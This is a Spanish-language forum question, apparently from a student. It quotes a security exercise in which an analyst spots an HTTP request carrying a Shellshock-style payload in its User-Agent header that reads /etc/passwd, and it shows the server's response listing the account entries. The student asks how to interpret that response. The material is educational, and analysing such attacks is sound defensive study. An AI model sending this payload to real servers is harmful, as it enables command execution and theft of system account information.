Estoy trabajando en una pregunta que involucra a alguien que usa una vulnerabilidad en un servidor Linux para poder acceder a ella. La primera parte de la pregunta dice
Al monitorear la actividad de la red entre un servidor web crítico de Goldmine Tech y un IP extranjera no confiable, Bob descubre la siguiente solicitud GET de HTTP de la IP no confiable:
GET /cgi-bin/status/status.cgi HTTP/1.1
Host: motherlode.goldminetech.edu
User-Agent: () { :;}; echo "PWNED by 0c007: “ $(</etc/passwd)
Entiendo que aquí se está utilizando una inyección de shell script mientras se ejecuta el comando $(</etc/passwd)
, lo que le da al pirata informático acceso a esta carpeta de contraseñas. A continuación, se muestra una respuesta HTTP aquí:
HTTP/1.1 200 OK
Content-Type: text/xml; charset=utf-8
Content-Length: length
root:!:0:0::/:/usr/bin/ksh
daemon:!:1:1::/etc:
bin:!:2:2::/bin:
sys:!:3:3::/usr/sys:
adm:!:4:4::/var/adm:
uucp:!:5:5::/usr/lib/uucp:
guest:!:100:100::/home/guest:
nobody:!:4294967294:4294967294::/:
lpd:!:9:4294967294::/:
lp:*:11:11::/var/spool/lp:/bin/false
invscout:*:200:1::/var/adm/invscout:/usr/bin/ksh
nuucp:*:6:5:uucp login user:/var/spool/uucppublic:/usr/sbin/uucp/uucico
paul:!:201:1::/home/paul:/usr/bin/ksh
jdoe:*:202:1:John Doe:/home/jdoe:/usr/bin/ksh
Se supone que debo determinar a qué accedió el hacker. Aquí es donde estoy atascado, ya que no puedo descifrar esta respuesta. He mirado a mi alrededor y no encuentro nada que explique cómo leer una respuesta HTTP de un servidor Linux. Cualquier ayuda sería apreciada grandemente.